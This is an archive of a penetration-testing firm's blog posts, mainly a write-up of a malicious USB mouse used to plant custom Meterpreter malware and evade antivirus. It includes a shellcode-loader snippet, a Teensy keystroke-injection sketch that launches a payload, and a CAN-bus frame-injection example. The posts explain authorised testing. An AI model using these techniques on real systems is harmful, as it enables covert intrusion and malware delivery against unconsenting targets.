Tuesday, November 15, 2011

Netragard’s Badge of Honor (Thank you McAfee)

Here at Netragard We Protect You From People Like Us™ and we mean it.  We don't just run automated scans, massage the output, and draft a report that makes you feel good.  That's what many companies do.  Instead, we "hack" you with a methodology driven by hands-on research, designed to create realistic and elevated levels of threat.  Don't take our word for it though; McAfee has helped us prove it to the world.

Through their Threat Intelligence service, McAfee Labs listed Netragard as a "High Risk" due to the level of threat that we produced during a recent engagement.  Specifically, we were using a beta variant of our custom Meterbreter malware (not to be confused with Metasploit's Meterpreter) during an Advanced Penetration Testing engagement.  The beta malware was identified and submitted to McAfee via our customer's Incident Response process.  The result was that McAfee listed Netragard as a "High Risk", which caught our attention (and our customer's attention) pretty quickly.

McAfee Flags Netragard as a High Risk
Badge of Honor

McAfee was absolutely right; we are "High Risk", or more appropriately, "High Threat", which in our opinion is critically important when delivering quality Penetration Testing services.  After all, the purpose of a Penetration Test (with regard to IT security) is to identify the presence of points where a real threat can make its way into or through your IT infrastructure.  Testing at less than realistic levels of threat is akin to testing a bulletproof vest with a squirt gun.

Netragard uses a methodology that's been dubbed Real Time Dynamic Testing™ ("RTDT").  Real Time Dynamic Testing™ is a research-driven methodology specifically designed to test the Physical, Electronic (networked and standalone) and Social attack surfaces at a level of threat that is slightly greater than what is likely to be faced in the real world.  Real Time Dynamic Testing™ requires that our Penetration Testers be capable of reverse engineering, writing custom exploits, building and modifying malware, etc.  In fact, the first rendition of our Meterbreter was created as a product of this methodology.

Another important aspect of Real Time Dynamic Testing™ is the targeting of attack surfaces individually or in tandem.  The "Netragard's Hacker Interface Device" article is an example of how Real Time Dynamic Testing™ was used to combine Social, Physical and Electronic attacks to achieve compromise against a hardened target.  Another article titled "Facebook from the hacker's perspective" provides an example of socially augmented electronic attacks driven by our methodology.

It is important that we thank McAfee for two reasons.  First, we thank McAfee for responding so quickly to our request to be removed from the "High Risk" list, because the listing was preventing our customers from being able to access our servers.  Second, and possibly more important, we thank McAfee for putting us on their "High Risk" list in the first place.  The mere fact that we were perceived as a "High Risk" by McAfee means that we are doing our job right.

Friday, June 24, 2011

Netragard's Hacker Interface Device (HID)

We (Netragard) recently completed an engagement for a client with a rather restricted scope. The scope included a single IP address bound to a firewall that offered no services whatsoever. It also excluded the use of social attack vectors based on social networks, telephone, or email, and disallowed any physical access to the campus and surrounding areas. With all of these limitations in place, we were tasked with penetrating the network from the perspective of a remote threat, and we succeeded.

The first method of attack that people might think of when faced with a challenge like this is the traditional autorun malware on a USB stick. Just mail a bunch of sticks to different people within the target company and wait for someone to plug one in; when they do, it's game over, they're infected. That trick worked great back in the day, but not so much anymore. The first issue is that most people are well aware of the USB stick threat due to the many published articles about the subject. The second is that more and more companies are pushing out group policies that disable the autorun feature on Windows systems. Those two things don't eliminate the USB stick threat, but they certainly have a significant impact on its level of success, and we wanted something more reliable.
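As a side note for the curious, the group policy in question typically just sets the well-known NoDriveTypeAutoRun registry value to 0xFF, which disables autorun on every drive type. The short C++ sketch below simply reads that value back; it is illustrative only and assumes a default policy location.

// C++ sketch (Windows): check whether autorun has been disabled by policy.
// A value of 0xFF in NoDriveTypeAutoRun disables autorun on all drive types.
#include <windows.h>
#include <cstdio>

int main() {
    HKEY key;
    DWORD value = 0, size = sizeof(value);
    const char *path = "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer";

    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, path, 0, KEY_READ, &key) == ERROR_SUCCESS) {
        if (RegQueryValueExA(key, "NoDriveTypeAutoRun", nullptr, nullptr,
                             reinterpret_cast<LPBYTE>(&value), &size) == ERROR_SUCCESS) {
            std::printf("NoDriveTypeAutoRun = 0x%02lX\n", value);  // 0xFF means autorun is off everywhere
        }
        RegCloseKey(key);
    }
    return 0;
}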

Enter PRION, the evil HID.

prion

A prion is an infectious agent composed of a protein in a misfolded form. In our case the prion isn't composed of proteins, but of electronics: a Teensy microcontroller, a micro USB hub (a small one from RadioShack), a mini USB cable (we needed the ends), a micro flash drive (made from one of our Netragard USB Streamers), some home-grown malware (certainly not designed to be destructive), and a USB device like a mouse, missile turret, dancing stripper, chameleon, or whatever else someone might be tempted to plug in. When they do plug it in, they will be infected by our custom malware and we will use that point of infection to compromise the rest of the network.

For the purposes of this engagement we chose to use a fancy Logitech USB mouse as our Hacker Interface Device / attack platform. To turn our Logitech Human Interface Device into a Hacker Interface Device, we had to make some modifications. The first step, of course, was to remove the screw from the bottom of the mouse and pop it open. Once we did that we disconnected the USB cable from the circuit board in the mouse and put it to the side. Then we proceeded to use a Dremel tool to shave away the extra plastic on the inside cover of the mouse (there were all sorts of tabs that we could sacrifice). The removal of the plastic tabs was to make room for the new hardware.

Once the top of the mouse was gutted and all the unnecessary parts removed, we began to focus on the USB hub. The first thing we had to do was extract the board from the hub. Doing that is a lot harder than it sounds because the hub that we chose was glued together and we didn't want to risk breaking the internals by being too rough. After about 15 minutes of prying with a small screwdriver (and repeated accidental hand stabbing) we were able to pull the board out of the plastic housing. We then proceeded to strip the female USB connectors off of the board by heating their respective pins to melt the solder (being careful not to burn the board). Once those were extracted we were left with a naked USB hub circuit board that measured about half an inch long and was no wider than a small Bic lighter.

With the mouse and the USB board prepared we began the process of soldering. The first thing that we did was take the mini USB cable and cut one of the ends off, leaving about 1 inch of wire near the connector. Then we stripped all the plastic off of the connector and stripped a small amount of insulation from the 4 internal wires. We soldered those four wires to the USB board, making sure to follow the right pinout pattern. This is the cable that will plug into the Teensy's mini USB port when we insert the Teensy microcontroller.

Once that was finished we took the USB cable that came with the mouse and cut the circuit board connector off of the end, leaving 2 inches of wire attached. We stripped the tips of the 4 wires still attached to the connector and soldered those to the USB hub, making sure to follow the right pinout patterns mentioned above. This is an important cable as it's the one that connects the USB hub to the mouse. If this cable is not soldered properly and the connections fail, then the mouse will not work. We then took the other piece of the mouse cable (the longer part) and soldered that to the USB board. This is the cable that will connect the mouse to the USB port on the computer.

At this point we have three cables soldered to the USB hub. Just to recap, those cables are the mouse connector cable, the cable that goes from the mouse to the computer, and the mini USB adapter cable for the Teensy device. The next and most challenging part was to solder the USB flash drive to the USB hub. This is important because the USB flash drive is where we store our malware. If the drive isn't soldered on properly then we won't be able to store our malware on the drive and the attack would be mostly moot. (We say mostly because we could still instruct the mouse to fetch the malware from a website, but that's not covert.)

To solder the flash drive to the USB hub we cut about 2 inches of cable from the mini USB connector that we stole the end from previously. We stripped the ends of the wires in the cable and carefully soldered them to the correct points on the flash drive. Once that was done we soldered the other ends of the cable to the USB hub. At that point we had everything soldered together and had to fit it all back into the mouse. Assembly was pretty easy because we were careful to use as little material as possible while still giving us the flexibility that we needed. We wrapped the boards and wires in single layers of electrical tape to avoid any shorts. Once everything was plugged in, we tested the devices. The USB drive mounted, the Teensy board was programmable, and the mouse worked.

Time to give prion the ability to infect…

We learned that the client was using McAfee as their antivirus solution because one of their employees was complaining about it on Facebook. Remember, we weren't allowed to use social networks for social engineering, but we certainly were allowed to do reconnaissance against social networks. With McAfee in our sights we set out to create custom malware for the client (as we do for any client and their respective antivirus solution when needed). We wanted our malware to be able to connect back to Metasploit because we love the functionality, and we also wanted the capabilities provided by Meterpreter, but we needed more than that. We needed our malware to be fully undetectable and to subvert the "Do you want to allow this connection" dialogue box entirely. You can't do that with encoding…

To make this happen we created a Meterpreter C array with the windows/meterpreter/reverse_tcp_dns payload. We then took that C array, chopped it up, and injected it into our own wrapper of sorts. The wrapper used an undocumented (0-day) technique to completely subvert the dialogue box and to evade detection by McAfee. When we ran our tests on a machine running McAfee, the malware ran without a hitch. We should point out that our ability to evade McAfee isn't any indication of its quality, and that we can evade any antivirus solution using similar custom attack methodologies. After all, it's impossible to detect something if you don't know what it is that you are looking for. (It also helps to have a team of researchers at our disposal.)
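For readers unfamiliar with the general pattern, here is a minimal sketch of what "a C array in a wrapper" looks like. It is deliberately generic: the payload bytes are harmless placeholders rather than real shellcode, and it does not show the undocumented evasion technique described above, only the basic idea of embedding payload bytes in a small loader.

// Generic "shellcode in a C array" loader sketch (C++). The bytes below are
// placeholders; real output from Metasploit (-f c) would go here. This is
// NOT the evasion wrapper described in the post.
#include <windows.h>
#include <cstring>

unsigned char payload[] = { 0x90, 0x90, 0xC3 };  // placeholder: NOP, NOP, RET

int main()
{
    // Allocate an executable buffer, copy the embedded bytes into it,
    // and transfer control to them.
    void *exec = VirtualAlloc(nullptr, sizeof(payload),
                              MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (exec == nullptr)
        return 1;

    std::memcpy(exec, payload, sizeof(payload));
    reinterpret_cast<void (*)()>(exec)();
    return 0;
}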

Once we had our malware built we loaded it onto the flash drive that we had soldered into our mouse. Then we wrote some code for the Teensy microcontroller to launch the malware 60 seconds after the start of user activity. Much of the code was taken from Adrian Crenshaw's website, and he deserves credit for giving us this idea in the first place. After a little bit of debugging, our evil mouse named prion was working flawlessly.
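For illustration, a stripped-down version of that Teensy logic looks something like the following (Teensyduino in USB Keyboard mode). The fixed delay, drive letter, and payload name are assumptions made for the sketch; the real code keyed off user activity and was considerably more careful.

// Minimal Teensyduino (C++) sketch: wait, open the Run dialog, and launch a
// payload from the embedded flash drive. Drive letter and file name are placeholders.
void setup() {
  delay(60000);                            // crude stand-in for "wait for user activity"

  Keyboard.set_modifier(MODIFIERKEY_GUI);  // Win+R opens the Run dialog
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(500);

  Keyboard.print("E:\\payload.exe");       // assumed mount point of the hidden flash drive
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

void loop() {
  // Nothing left to do once the payload has been launched.
}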

Usage: Plug mouse into computer, get pwned.

The last and final step was to ship the mouse to our customer. One of the most important aspects of this was repacking the mouse in its original packaging so that it appeared unopened. Then we used Jigsaw to purchase a list of our client's employees. We did a bit of reconnaissance on each employee and found a target that looked ideal. We packaged the mouse to look like a promotional gadget, added fake marketing flyers, etc., then shipped the mouse. Sure enough, three days later the mouse called home.

pwned

Friday, February 25, 2011

Netragard Signage Snatching

Recently Netragard has had a few discussions with owners and operators of sports arenas, with the purpose of identifying methods by which a malicious hacker could potentially disrupt a sporting event, concert, or other large-scale and highly visible event.

During the course of these conversations, the topic of discussion shifted from network exploitation to social engineering, with a focus on compromise of the digital signage systems.  Until recently, even I hadn't thought about how extensively network-controlled signage systems are used in facilities like casinos, sports arenas, airports, and roadside billboards.  That is, until our most recent casino project.

Netragard recently completed a Network Penetration Test and Social Engineering Test for a large west coast casino, with spectacular results. Not only were our engineers able to gain the keys to the kingdom, they were also able to gain access to the systems that had supervisory control for every single digital sign in the facility.  Some people may think to themselves, “ok, what’s the big deal with that?”.  The answer is simple:  Customer perception and corporate image.

Before I continue on, let me provide some background.  Early in 2008, there were two incidents in California where on-highway digital billboards were compromised and their displays changed from the intended content.  While both of these incidents were small pranks in comparison to what they could have been, the effect was remembered by those who drove by and saw the signs.  (Example A, Example B)

Another recent billboard hack, in Moscow, Russia, wasn't as polite as the pranksters in California.  A hacker was able to gain control of a billboard in downtown Moscow (worth noting, Moscow is the 7th largest city in the world) and, after gaining access, looped a video clip of pornographic material. (Example C)  Imagine if this had happened to a sports organization during a major game.

Bringing this post back on track, let's refocus on the casino and the potential impact of signage compromise.  After spending time in the signage control server, we determined that there were over 40 unique displays available to control, some of which were over 100″ in display size.  With customer permission, we placed a unique image on a small sign for proof-of-concept purposes (go google "stallowned").  This test, coupled with an impact audit, clearly highlighted to the casino that securing their signage systems was nearly as important as securing their security systems, cage systems, and domain controllers.  All the domain security in the world means little to a customer if they're presented with disruptive material on the signage during their visit to the casino.  A compromise of this nature could cause significant loss of revenue, and cause a customer to never revisit the casino.

I also thought it pertinent for the purpose of this post to share another customer engagement story.  This story highlights how physical security can be compromised by a combination of social engineering and network exploitation, thus opening an additional risk vector that could allow for compromise of the local network running the digital display systems.

Netragard was engaged by a large bio-sciences company in late 2010 to assess the network and physical security of multiple locations belonging to a business unit that was a new acquisition.  During the course of this engagement, Netragard was able to take complete control of their network infrastructure remotely, as is the case in most of our engagements.  More importantly, our engineers were able to use their social engineering skills to "convince" the physical site staff to grant them building access.  Once past this first layer of physical security, by combining social and network exploitation, they were subsequently able to gain access to sensitive labs and document storage rooms.  These facilities and rooms were key to the organization's intellectual property and ongoing research.  Had our engineers been hired by a competing company or other entity, there would have been a 100% chance that the IP (research data, trials data, and so forth) could have been spirited off company property and into hands unknown.

By combining network exploitation and social engineering, we've postulated to the sports arena operators that Netragard has a high probability of gaining access to the control systems for their digital signage.  Inevitably, during these discussions the organizations push back, stating that their facilities have trained security staff and access control systems.  To that we respond that the majority of sports facility staff are attuned to illicit access attempts in controlled areas only during certain periods of operation, such as active games, concerts, and other large-scale events.  During non-public hours, though, there's a high probability that a skilled individual could gain entry to access-controlled areas during a private event, or through a breach of trust, such as posing as a repair technician, emergency services employee, or even a facility employee.

One area of concern for any organization, whether it be a football organization, a Fortune 100 company, or a mid-size business, is a breach of trust with its consumer base.  For a major sports organization, the level of national exposure and endearment far exceeds the exposure most Netragard customers have to the public.  Because of this extremely high national exposure, a sports organization and its arena are a prime target for those who may consider highly visible public disruption of games a key tool in furthering a socio-political agenda.  We're hopeful that these organizations will continue to take a more serious stance to ensure that their systems and public image are as protected as possible.

Tuesday, February 22, 2011

Quality Penetration Testing by Netragard

The purpose of Penetration Testing is to identify the presence of points where an external entity can make its way into or through a protected entity. Penetration Testing is not unique to IT security and is used across a wide variety of different industries. For example, Penetration Tests are used to assess the effectiveness of body armor. This is done by exposing the armor to different munitions that represent the real threat. If a projectile penetrates the armor then the armor is revised and improved upon until it can endure the threat.

Network Penetration Testing is a class of Penetration Testing that applies to Information Technology. The purpose of Network Penetration Testing is to identify the presence of points where a threat (defined by the hacker) can align with existing risks to achieve penetration. The accurate identification of these points allows for remediation.

Successful penetration by a malicious hacker can result in the compromise of data with respect to Confidentiality, Integrity and Availability (“CIA”). In order to ensure that a Network Penetration Test provides an accurate measure of risk (risk = probability x impact) the test must be delivered at a threat level that is slightly elevated from that which is likely to be faced in the real world. Testing at a lower than realistic threat level would be akin to testing a bulletproof vest with a squirt gun.

Threat levels can be adjusted by adding or removing attack classes. These attack classes are organized under three top-level categories, which are Network Attacks, Social Attacks, and Physical Attacks. Each of the top-level categories can operate in a standalone configuration or can be used to augment the other. For example, Network Penetration Testing with Social Engineering creates a significantly higher level of threat than just Network Penetration Testing or Social Engineering alone. Each of the top-level threat categories contains numerous individual attacks.

A well-designed Network Penetration Testing engagement should employ the same attack classes as a real threat. This ensures that testing is realistic which helps to ensure effectiveness. All networked entities face threats that include Network and Social attack classes. Despite this fact, most Network Penetration Tests entirely overlook the Social attack class and thus test at radically reduced threat levels. Testing at reduced threat levels defeats the purpose of testing by failing to identify the same level of risks that would likely be identified by the real threat. The level of threat that is produced by a Network Penetration Testing team is one of the primary measures of service quality.

Tuesday, January 25, 2011

Netragard Challenges your PCI Compliance

The purpose of legitimate Network Penetration Testing is to positively identify risks in a targeted IT Infrastructure before those risks are identified and exploited by malicious hackers. This enables IT managers to remediate those risks before they become an issue. To accomplish this, the Penetration Test must be driven by people with at least the same degree of skill and persistence as the threat (defined by the malicious hacker). If the Penetration Test is delivered with a skill set that is less than that of the real threat, then the test will likely be ineffective. This would be akin to testing the effectiveness of a bulletproof vest with a squirt gun.

Unfortunately, most penetration tests don't test at realistic threat levels. This is especially true with regard to PCI-based penetration tests. Most PCI-based penetration testing companies do the bare minimum required to satisfy PCI requirement 11.3. This is problematic because it results in businesses passing their PCI penetration tests when they should have failed, and it promotes a false sense of security. The truth is that most businesses that pass their annual PCI audits are still relatively easy to hack. If you don't believe us, then let us prove it and hire us (Netragard) to deliver a conditional penetration test. If we can't penetrate your network using our unrestricted, advanced methodology, then the next test is free. (Challenge ends March 31st, 2011.)

Sunday, January 16, 2011

Netragard: Connect to Chaos

The Chevy Volt will be the first car of its type: not because it is a hybrid electric/petrol vehicle, but because GM plans to give each one the company sells its own IP address. The Volt will have no less than 100 microcontrollers running its systems from some 10 million lines of code. This makes some hackers very excited and Adriel Desautels, president of security analysis firm Netragard, very worried. Before now, you needed physical access to reprogram the software inside a car: an 'air gap' protected vehicles from remote tampering. The Volt will have no such physical defence. Without some kind of electronic protection, Desautels sees cars such as the Volt and its likely competitors becoming 'hugely vulnerable 5000lb pieces of metal'.

Desautels adds: “We are taking systems that were not meant to be exposed to the threats that my team produces and plug it into the internet. Some 14 year old kid will be able to attack your car while you’re driving.”

The full article can be found here.

Friday, January 14, 2011

Pentesting IPv6 vs IPv4

We've heard a bit of "noise" about how IPv6 may impact network penetration testing and how networks may or may not be more secure because of IPv6.  Let's be clear: anyone telling you that IPv6 makes penetration testing harder doesn't understand the first thing about real penetration testing.

What's the point of IPv6?

IPv6 was designed by the Internet Engineering Task Force ("IETF") to address the issue of IPv4 address space exhaustion.  IPv6 uses a 128-bit address space while IPv4 uses only 32 bits.  This means that there are 2^128 possible addresses with IPv6, far more than the 2^32 addresses available with IPv4.  It also means that there are going to be many more potential targets for a penetration tester to focus on when IPv6 becomes the norm.

What about increased security with IPv6?

The IPv6 specification mandates support for the Internet Protocol Security ("IPSec") protocol suite, which is designed to secure IP communications by authenticating and encrypting each IP packet. IPSec operates at the Internet Layer of the Internet Protocol suite and so differs from other security systems like the Secure Sockets Layer, which operates at the application layer. This is the only significant security enhancement that IPv6 brings to the table, and even this has little to no impact on penetration testing.

What some penetration testers are saying about IPv6.

Some penetration testers argue that IPv6 will make the job of penetration testing more difficult because of the massive increase in potential targets. They claim that this increase will make the process of discovering live targets impossibly time consuming, arguing that scanning each port/host in an entire IPv6 range could take as long as 13,800,523,054,961,500,000 years.  But why the hell would anyone waste their time testing potential targets when they could be testing actual live targets?

The very first step in any penetration test is effective and efficient reconnaissance. Reconnaissance is the military term for the passive gathering of intelligence about an enemy prior to attacking that enemy.  There are countless ways to perform reconnaissance, all of which must be adapted to the particular engagement.  Failure to adapt will result in bad intelligence, as no two targets are exactly identical.

A small component of reconnaissance is target identification.  Target identification may or may not be done with scanning, depending on the nature of the penetration test.  Specifically, it is impossible to deliver a true stealth / covert penetration test with automated scanners.  Likewise, it is very difficult to use a scanner to accurately identify targets in a network that is protected by reactive security systems (like a well configured IPS that supports black-listing).  So in many cases doing discovery by scanning an entire block of addresses is ineffective.

A few common methods for target identification include Social Engineering, DNS enumeration, or maybe something as simple as asking the client to provide you with a list of targets.  Less common methods involve more aggressive social reconnaissance, continued reconnaissance after initial penetration, etc.  Either way, it will not take 13,800,523,054,961,500,000 years to identify all of the live and accessible targets in an IPv6 network if you know what you are doing.
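As a simple illustration of the DNS enumeration approach, the sketch below resolves AAAA records for a handful of candidate hostnames rather than sweeping the address space. The hostnames are placeholders; on a real engagement the candidate list would come out of reconnaissance.

// C++ sketch: find live IPv6 targets by asking DNS for AAAA records
// instead of scanning 2^128 addresses. Hostnames are placeholders.
#include <cstdio>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

int main() {
    const char *candidates[] = { "www.example.com", "mail.example.com", "vpn.example.com" };

    for (const char *host : candidates) {
        addrinfo hints{};
        hints.ai_family = AF_INET6;        // ask only for IPv6 (AAAA) answers
        hints.ai_socktype = SOCK_STREAM;

        addrinfo *results = nullptr;
        if (getaddrinfo(host, nullptr, &hints, &results) != 0)
            continue;                      // no AAAA record; move on

        for (addrinfo *p = results; p != nullptr; p = p->ai_next) {
            char text[INET6_ADDRSTRLEN];
            auto *sin6 = reinterpret_cast<sockaddr_in6 *>(p->ai_addr);
            inet_ntop(AF_INET6, &sin6->sin6_addr, text, sizeof(text));
            std::printf("%s -> %s\n", host, text);   // a live target worth testing
        }
        freeaddrinfo(results);
    }
    return 0;
}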

Additionally, penetration testing against 12 targets in an IPv6 network will take the same amount of time as testing 12 targets in an IPv4 network.  The number of real targets is what is important, not the number of potential targets.  It would be a ridiculous waste of time to test 2^128 IPv6 addresses when only 12 IP addresses are live.  Not to mention that the increase in time would likely translate to an increase in project cost.

So in reality, for those who are interested, hacking an IPv6 network won't be any more or less difficult than hacking an IPv4 network.  Anyone who argues otherwise either doesn't know what they are doing or is looking to charge you more money for roughly the same amount of work.

Friday, January 7, 2011

Hacking your car for fun and profit.

Our CEO (Adriel Desautels) recently spoke at the Green Hills Software Elite Users Technology Summit regarding automotive hacking.  During his presentation there were several reporters taking photographs, recording audio, etc.  Of all of the articles that came out, one in particular caught our eye.  We made the front page of "Elektronik i Norden", a Nordic technology magazine that focuses on hardware and embedded systems.  You can see the full article here, but you'll probably want to translate it:

http://www.webbkampanj.com/ein/1011/?page=1&mode=50&noConflict=1

What really surprised us during the presentation was how many people were in disbelief about the level of risk associated with cars built after 2007.  For example, it really isn't all that hard to program a car to kill the driver.  In fact, it's far too easy due to the overall lack of security in cars today.

Think of a car as an IT infrastructure.  All of the servers in the infrastructure are critical systems that control things like brakes, seat belts, door locks, engine timing, airbags, lights, the radio, the dashboard display, etc.  Instead of these systems being plugged into a switched network, they are plugged into a hub-like network lacking any segmentation, with no security to speak of.  The only real difference between the car network and your business network is that the car doesn't have an internet connection.
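To make the "hub with no segmentation" point concrete: the controllers in most modern cars share a broadcast bus (CAN is the common one), and any node on that bus can transmit a frame with any identifier, with nothing authenticating the sender. The sketch below shows how trivially a frame is put on such a bus from a Linux test bench using SocketCAN; the interface name and identifier are placeholders, not values from any real vehicle.

// C++ sketch (Linux SocketCAN): any node on a CAN bus can broadcast any
// frame, and receivers have no way to verify who sent it. The interface
// name and CAN ID below are placeholders.
#include <cstring>
#include <cstdio>
#include <unistd.h>
#include <net/if.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <linux/can.h>
#include <linux/can/raw.h>

int main() {
    int s = socket(PF_CAN, SOCK_RAW, CAN_RAW);
    if (s < 0) { perror("socket"); return 1; }

    // Bind the raw CAN socket to a bus interface (e.g. can0 on a bench setup).
    ifreq ifr{};
    std::strcpy(ifr.ifr_name, "can0");
    ioctl(s, SIOCGIFINDEX, &ifr);

    sockaddr_can addr{};
    addr.can_family = AF_CAN;
    addr.can_ifindex = ifr.ifr_ifindex;
    bind(s, reinterpret_cast<sockaddr *>(&addr), sizeof(addr));

    // Build and send an arbitrary frame; nothing on the bus checks the sender.
    can_frame frame{};
    frame.can_id  = 0x123;        // placeholder identifier
    frame.can_dlc = 2;            // two data bytes
    frame.data[0] = 0xDE;
    frame.data[1] = 0xAD;
    write(s, &frame, sizeof(frame));

    close(s);
    return 0;
}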

Enter the Chevrolet Volt, the first car to have its own IP address. Granted, we don't yet know how the Volt's IP address will be protected.  We don't know if each car will have a public IP address or if the cars will be connected to a private network controlled by Chevy (or someone else).  What we do know is that the car will be able to reach out to the internet, and so it will be vulnerable to client-side attacks.

So what happens if someone is able to attack the car?

Realistically, if someone is able to hack into the car then they will be able to take full control over almost any component of it.  They can do anything from applying the brakes, accelerating the car, preventing the brakes from applying, killing (literally destroying) the engine, applying the brakes on one side of the car, locking the doors, pretensioning the seat belts, etc.  For those of you that think this is science fiction, it isn't.  Here's one of many research papers that demonstrates the risks.

Why is this possible?

This is possible because people adopt technology too quickly and don't stop to think about the risks, but instead are blinded by the convenience that it introduces.  We see this in all industries, not just automotive. IT managers, CIOs, CSOs, CEOs, etc. are always purchasing and deploying new technologies without really evaluating the risks.  In fact, just recently we had a client purchase a "secure email gateway" technology… it wasn't too secure.  We were able to hack it and access every email on the system because it relied on outdated third-party software.

Certainly another component that adds to this is that most software developers write vulnerable and buggy code (sorry guys, but it's true).  Their code isn't written to be secure; it's written to do a specific thing like handle network traffic, beep your horn, send emails, whatever.  Poor code + a lack of security awareness == high risks.

So what can you do?

Before you decide to adopt new technology make sure that you understand the benefits and the risks associated with the adoption.  If you’re not technical enough (most people aren’t) to do a low-level security evaluation then hire someone (a security researcher) to do it for you.  If you don’t then you could very well be putting yourselves and your customers at serious risk.

Thursday, December 2, 2010

Untitled

I recently participated in a panel at the BASC conference that was held at the Microsoft New England Research & Development (NERD) building at One Memorial Drive in Cambridge. One of the questions that surfaced inspired me to write this article.

While there are more security solutions available today than ever before, are we actually becoming more secure, or is the gap growing? The short answer is yes to both. The security industry is reactive in that it can only respond to threats; it cannot predict them. This is because threats are defined by malicious hackers and technology-savvy criminals, not by the security industry. Antivirus technology, for example, was created as a response to viruses that were being written by hackers. So yes, security is getting better and technologies are advancing, yet the gap is still growing rapidly. One major part of the problem is that people adopt new technologies too quickly. They don't stop to question those technologies from the perspective of a hacker…

A prime example of this problem is clearly demonstrated within the automotive industry. The computer systems in automobiles were not designed to withstand any sort of real hacker threat. This wasn't much of a problem at first because automotive computer systems weren't Internet connected, and at first they didn't have direct control over things like the brakes and the accelerator. That all changed as the automotive industry advanced and as people wanted the convenience that computer technology could bring to the table. Now automotive computer systems directly control critical automotive functions, and a hacker can interface with the computer system and cause potentially catastrophic failures. Despite this, the problem wasn't perceived as particularly high risk because accessing the computer system required physical access to the car (or close proximity for TPMS-style hacks). That is all going to change when the Chevy Volt hits the streets, since the Chevy Volt actually has its own IP address and is network connected. Is the risk really worth the convenience?

Another good example of how we adopt technology too quickly is demonstrated in critical infrastructure (power, water, communications, etc.). Just like in the automotive industry, critical systems were not initially designed to be plugged into the Internet. These critical systems are the systems that control the water coolant levels in our nuclear power plants or the mixtures of chemicals in water treatment plants, etc. Some of these critical systems were designed in the 1960s, when the concept of the "hacker threat" didn't exist. Other systems are very modern, but even those aren't designed to be secure as much as they are designed to be functional. Back in the day power plants, water treatment plants, etc. were air-gapped to isolate them from potentially harmful environments. But as the Internet offered more and more convenience, the air gaps that once existed have become almost extinct. Now our critical systems are connected to the Internet and exposed to real hacker threats; and do they get hacked? Yes. Again, is the risk really worth the convenience?

Of course an example that everyone can relate to is business networks. Business networks are constantly evolving, and new technologies are continually being adopted without proper vetting. These technologies often include web applications, security technologies, backup technologies, content management systems, etc. These technologies usually promise to make things easier and thus save time, which equates to saving money. For example, the other week we were delivering a penetration test for a pharmaceutical company. This company had a video conference system set up so that they could speak with remote offices and have "face to face" conversations. They loved the technology because it made for more productive meetings, and we loved the technology because it was easy to hack.

Despite the fact that the security industry is evolving at a rapid pace, it can't keep up with the volume of people that are prematurely adopting new and untested technologies. This adoption causes the gap between good security and security risks to grow. To help close the gap, consumers need to start challenging their vendors. They need to ask their vendors to demonstrate the security of their technology and maybe even to make some sort of a guarantee about it. There are some solid companies out there that offer services designed to enhance the security of technology products. One such company is Veracode (no affiliation with Netragard).